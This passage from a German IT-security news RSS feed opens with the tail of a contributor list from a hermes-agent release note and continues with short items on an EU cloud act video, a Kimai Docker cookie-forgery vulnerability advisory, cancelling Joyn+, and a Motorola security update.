data-hovercard-url="/users/egilewski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/egilewski">@egilewski</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/elashera/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/elashera">@elashera</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Elektrofussel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Elektrofussel">@Elektrofussel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eliteworkstation94-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eliteworkstation94-ai">@eliteworkstation94-ai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/embwl0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/embwl0x">@embwl0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emo-eth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emo-eth">@emo-eth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emozilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emozilla">@emozilla</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/enzo-adami/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/enzo-adami">@enzo-adami</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Epoxidex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Epoxidex">@Epoxidex</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ErnestHysa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ErnestHysa">@ErnestHysa</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/esthonjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/esthonjr">@esthonjr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evefromwayback/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evefromwayback">@evefromwayback</a>, @evelynburger, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/F4TB0Yz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/F4TB0Yz">@F4TB0Yz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/falkoro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/falkoro">@falkoro</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fanyangCS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fanyangCS">@fanyangCS</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/firefly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firefly">@firefly</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjlaowan1983/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjlaowan1983">@fjlaowan1983</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flewe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flewe">@flewe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flo1t/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flo1t">@flo1t</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flow-digital-ny/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flow-digital-ny">@flow-digital-ny</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/floze-the-genius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/floze-the-genius">@floze-the-genius</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frizikk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frizikk">@frizikk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frowtek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frowtek">@Frowtek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuryMartin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuryMartin">@FuryMartin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fyzanshaik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fyzanshaik">@fyzanshaik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gauravsaxena1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gauravsaxena1997">@gauravsaxena1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geoffreybutler94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geoffreybutler94">@geoffreybutler94</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/georgedrury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/georgedrury">@georgedrury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gigakun3030/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gigakun3030">@gigakun3030</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giggling-ginger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giggling-ginger">@giggling-ginger</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Git-on-my-level/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Git-on-my-level">@Git-on-my-level</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitcommit90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitcommit90">@gitcommit90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/githubespresso407/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/githubespresso407">@githubespresso407</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnodet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnodet">@gnodet</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GottZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GottZ">@GottZ</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gridzilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gridzilla">@Gridzilla</a>, @grimmjoww578, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumclaw">@gumclaw</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HaiderSultanArc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HaiderSultanArc">@HaiderSultanArc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harjothkhara/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harjothkhara">@harjothkhara</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heathley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heathley">@heathley</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hejuntt1014/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hejuntt1014">@hejuntt1014</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HeLLGURD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HeLLGURD">@HeLLGURD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hellno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hellno">@hellno</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/herbalizer404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/herbalizer404">@herbalizer404</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HexLab98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HexLab98">@HexLab98</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hmirin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hmirin">@hmirin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hopfensaft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hopfensaft">@Hopfensaft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hotragn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hotragn">@Hotragn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hsy5571616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hsy5571616">@hsy5571616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huanshan5195/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huanshan5195">@huanshan5195</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HumphreySun98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HumphreySun98">@HumphreySun98</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydracoco7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydracoco7">@hydracoco7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydraxman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydraxman">@hydraxman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iamlukethedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iamlukethedev">@iamlukethedev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iborazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iborazzi">@iborazzi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IgorGanapolsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IgorGanapolsky">@IgorGanapolsky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iizotov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iizotov">@iizotov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ildunari/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ildunari">@ildunari</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitycrew39/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitycrew39">@infinitycrew39</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IpastorSan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IpastorSan">@IpastorSan</a>, @irresi, @isfttr, @isheng-eqi, @itsflownium, @izumi0uu, @Jaaneek, @JacketPants,<br>
@jaisup, @jakelongvu-bot, @jakepresent, @jaketracey, @JAlmanzarMint, @JasonFang1993, @jbbottoms, @jcjc81,<br>
@JiaDe-Wu, @Jiahui-Gu, @Jigoooo, @jingsong-liu, @jneeee, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, @joelbrilliant, @John-Lussier, @jplew,<br>
@jtstothard, @juniperbevensee, @Jupiter363, @justinschille, @k4z4n0v4, @kaishi00, @karfly, @kartik-mem0,<br>
@kavioavio, @KCAYAAI, @kenyonxu, @keslerm, @kevinrajaram, @knoal, @kocaemre, @kohoj, @konsisumer, @krowd3v,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, @kuangmi-bit, @kubolko, @kyssta-exe, @Kyzcreig, @l0h1nth, @labsobsidian, @laurinaitis,<br>
@LavyaTandel, @lawyer112, @lemonwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD, @linfeng961, @liuhao1024, @liuwei666888, @ljy-2000,<br>
@loes5050, @logical-and, @LoicHmh, @loongfay, @lord-dubious, @lost9999, @lucasfdale, @lucaskvasirr,<br>
@luxuguang-leo, @ly-wang19, @m0n5t3r, @m1qaweb, @M1racleShih, @MaartenDMT, @mahdiwafy, @MaheshBhushan,<br>
@ManniBr, @marcelohildebrand, @marcolivierlavoie, @markoub, @MarkVLK, @Marxb85, @matantsevs,<br>
@maxpetrusenkoagent, @mbac, @mdc2122, @mguttmann, @Mibayy, @michaelHMK, @mijanx, @minchang, @momomojo,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MorAlekss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MorAlekss">@MorAlekss</a>, @morluto, @msh01, @mssteuer, @mvanhorn, @nanami7777777, @nankingjing, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, @neo-claw-bot,<br>
@neoguyverx, @nicha16, @nikshepsvn, @nima20002000, @nnnet, @NousResearch, @nullptr0807, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a>,<br>
@okisdev, @OmarB97, @ooiuuii, @ooovenenoso, @oppih, @Osraka, @ostravajih, @otsune, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @OYLFLMH,<br>
@patrick-muller, @pdmartins, @pedrommaiaa, @Peterskaronis, @petrichor-op, @pgregg88, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pierrenode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pierrenode">@pierrenode</a>, @pixel4039,<br>
@plcunha, @pnascimento9596, @Polyhistor, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a>, @professorpalmer, @Punyko8, @Que0x, @Qwinty,<br>
@r0gersm1th, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, @rabadaki, @ragingbulld, @RainbowAndSun, @rainbowgore, @randimt, @rarf, @rasitakyol,<br>
@rayjun, @raymondyan-zhijie, @re-ITRT, @RenoMG, @Rival, @RKelln, @rlaehddus302, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, @rodboev,<br>
@roryford, @rungmc357, @ruslanvasylev, @s0xn1ck, @s905060, @s96919, @sahibzada-allahyar, @sahil-shubham,<br>
@Sahil-SS9, @SahilRakhaiya05, @sam7894604, @SAMBAS123, @samrusani, @sanidhyasin, @sasquatch9818, @sberan,<br>
@ScotterMonk, @seagpt, @sebastianlutycz, @SemonCat, @setclock, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, @sharziki, @shashwatgokhe,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @shuangxinniao, @SilentKnight87, @simplast, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>, @SiteupAgencia, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjiangtao2024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjiangtao2024">@sjiangtao2024</a>, @sk-holmes,<br>
@slow4cyl, @smtony, @soddy022, @Soju06, @solyanviktor-star, @SongotenU, @spiky02plateau, @sprmn24, @SquabbyZ,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, @ssiweifnag, @stantheman0128, @StellarisW, @stephenschoettler, @suninrain086, @superposition,<br>
@Supersynergy, @sweetcornna, @szafranski, @tanmayxchoudhary, @tarunravi, @tcconnally, @terry197913, @Thatgfsj,<br>
@thegoodguysla, @thestudionorth, @TheTom, @TinkerOfThings, @tjboudreaux, @tjp2021, @Tortugasaur, @Tosko4,<br>
@Tranquil-Flow, @trevorgordon981, @trismegistus-wanderer, @tt-a1i, @tuancookiez-hub, @TurgutKural, @Umi4Life,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UnathiCodex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UnathiCodex">@UnathiCodex</a>, @unsupportedpastels, @uzaylisak, @valda, @vampyren, @veradim, @victor-kyriazakos, @virtualex-itv,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, @Vissirexa, @vizi0uz, @vkkong, @vKongv, @VolodymyrBg, @vortexopenclaw, @VrtxOmega, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>,<br>
@waroffchange, @waseemshahwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, @webtecnica, @wesleion, @wesleysimplicio, @williamumu,<br>
@WilsonKinyua, @wxy-nlp, @wyuebei-cloud, @x7peeps, @x9x9x9x9x9x91, @xuezhaolan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @ya-nsh, @yatesjalex,<br>
@ygd58, @yingliang-zhang, @yinkev, @YLChen-007, @yu-xin-c, @yungchentang, @zapabob, @zccyman, @zeapsu,<br>
@ziliangpeng, @zwcf5200, @zzpigpinggai</p>
<p>Also: bo.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.7.1...v2026.7.20">v2026.7.1...v2026.7.20</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie die EU europäische "Unabhängigkeit" vortäuschen will]]></title>
<description><![CDATA[Author: The Morpheus - Bewertung: 59x - Views:615 Der Cloud and AI Development Act: Eine tolle Chance sich wirklich als unabhängig zu vermarkten - obwohl man es vielleicht gar nicht ist.

[Werbung] 
Hier geht's zu unserem Partner, Hostinger: https://www.hostg.xyz/SHJLp
10% Rabatt Code: Morpheus10...]]></description>
<link>https://tsecurity.de/de/3681556/video/wie-die-eu-europaeische-unabhaengigkeit-vortaeuschen-will/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681556/video/wie-die-eu-europaeische-unabhaengigkeit-vortaeuschen-will/</guid>
<pubDate>Mon, 20 Jul 2026 17:21:54 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus - Bewertung: 59x - Views:615 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/QL9puC7f8uE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Der Cloud and AI Development Act: Eine tolle Chance sich wirklich als unabhängig zu vermarkten - obwohl man es vielleicht gar nicht ist.<br />
<br />
[Werbung] <br />
Hier geht's zu unserem Partner, Hostinger: https://www.hostg.xyz/SHJLp<br />
10% Rabatt Code: Morpheus10<br />
<br />
MorphReader im PlayStore: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app&hl=de<br />
<br />
MorphReader im App Store: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS-Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Bootstrap Academy: https://bootstrap.academy/<br />
https://github.com/Bootstrap-Academy/<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Quellen:<br />
https://kdrive.infomaniak.com/app/share/1794086/4326a496-b513-4b19-bf9c-14aed3b92b66<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimai Docker Flaw Lets Unauthenticated Attackers Forge Cookies and Take Over Accounts]]></title>
<description><![CDATA[Kimai users utilizing the official Docker image are strongly urged to update their installations following the disclosure of a critical vulnerability that could allow unauthenticated attackers to forge authentication cookies and potentially take over accounts, including super administrator accoun...]]></description>
<link>https://tsecurity.de/de/3681203/it-security-nachrichten/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681203/it-security-nachrichten/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/</guid>
<pubDate>Mon, 20 Jul 2026 15:08:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kimai users utilizing the official Docker image are strongly urged to update their installations following the disclosure of a critical vulnerability that could allow unauthenticated attackers to forge authentication cookies and potentially take over accounts, including super administrator accounts. This vulnerability, tracked as CVE-2026-52824, affects Kimai versions 2.57.0 and earlier. The issue has been resolved […]</p>
<p>The post <a href="https://cybersecuritynews.com/kimai-docker-flaw/">Kimai Docker Flaw Lets Unauthenticated Attackers Forge Cookies and Take Over Accounts</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimai Docker Flaw Lets Unauthenticated Attackers Forge Cookies and Take Over Accounts]]></title>
<description><![CDATA[Kimai users utilizing the official Docker image are strongly urged to update their installations following the disclosure of a critical vulnerability that could allow unauthenticated attackers to forge authentication cookies and potentially take over accounts, including super administrator accoun...]]></description>
<link>https://tsecurity.de/de/3681192/it-security-nachrichten/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681192/it-security-nachrichten/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/</guid>
<pubDate>Mon, 20 Jul 2026 15:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kimai users utilizing the official Docker image are strongly urged to update their installations following the disclosure of a critical vulnerability that could allow unauthenticated attackers to forge authentication cookies and potentially take over accounts, including super administrator accounts. This…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kimai-docker-flaw-lets-unauthenticated-attackers-forge-cookies-and-take-over-accounts/">Kimai Docker Flaw Lets Unauthenticated Attackers Forge Cookies and Take Over Accounts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Joyn+ kündigen: So beendet ihr euer Abo beim deutschen Streamingdienst]]></title>
<description><![CDATA[Joyn+ könnt ihr dank Testphase kostenlos ausprobieren. Wer nicht rechtzeitig kündigt, hat aber schnell ein kostenpflichtiges Abo am Hals. Wir zeigen, wie ihr es kündigt.
																					Dieser Artikel wurde einsortiert unter 
																	Anleitungen,																	Download,											...]]></description>
<link>https://tsecurity.de/de/3681185/it-nachrichten/joyn-kuendigen-so-beendet-ihr-euer-abo-beim-deutschen-streamingdienst/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681185/it-nachrichten/joyn-kuendigen-so-beendet-ihr-euer-abo-beim-deutschen-streamingdienst/</guid>
<pubDate>Mon, 20 Jul 2026 15:02:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Joyn+ könnt ihr dank Testphase kostenlos ausprobieren. Wer nicht rechtzeitig kündigt, hat aber schnell ein kostenpflichtiges Abo am Hals. Wir zeigen, wie ihr es kündigt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/anleitung/index.html">Anleitungen</a>,																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/joyn-index.html">Joyn</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Motorola: Wer dieses Handy nutzt, muss im Juli aktiv werden]]></title>
<description><![CDATA[Motorola verteilt für seine Handys im Juli ein wichtiges Sicherheitsupdate. Der Patch steht aktuell schon für dieses Modell zum Download bereit.
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	Android,																	Lenovo und Motorola: So...]]></description>
<link>https://tsecurity.de/de/3680663/it-nachrichten/motorola-wer-dieses-handy-nutzt-muss-im-juli-aktiv-werden/</link>
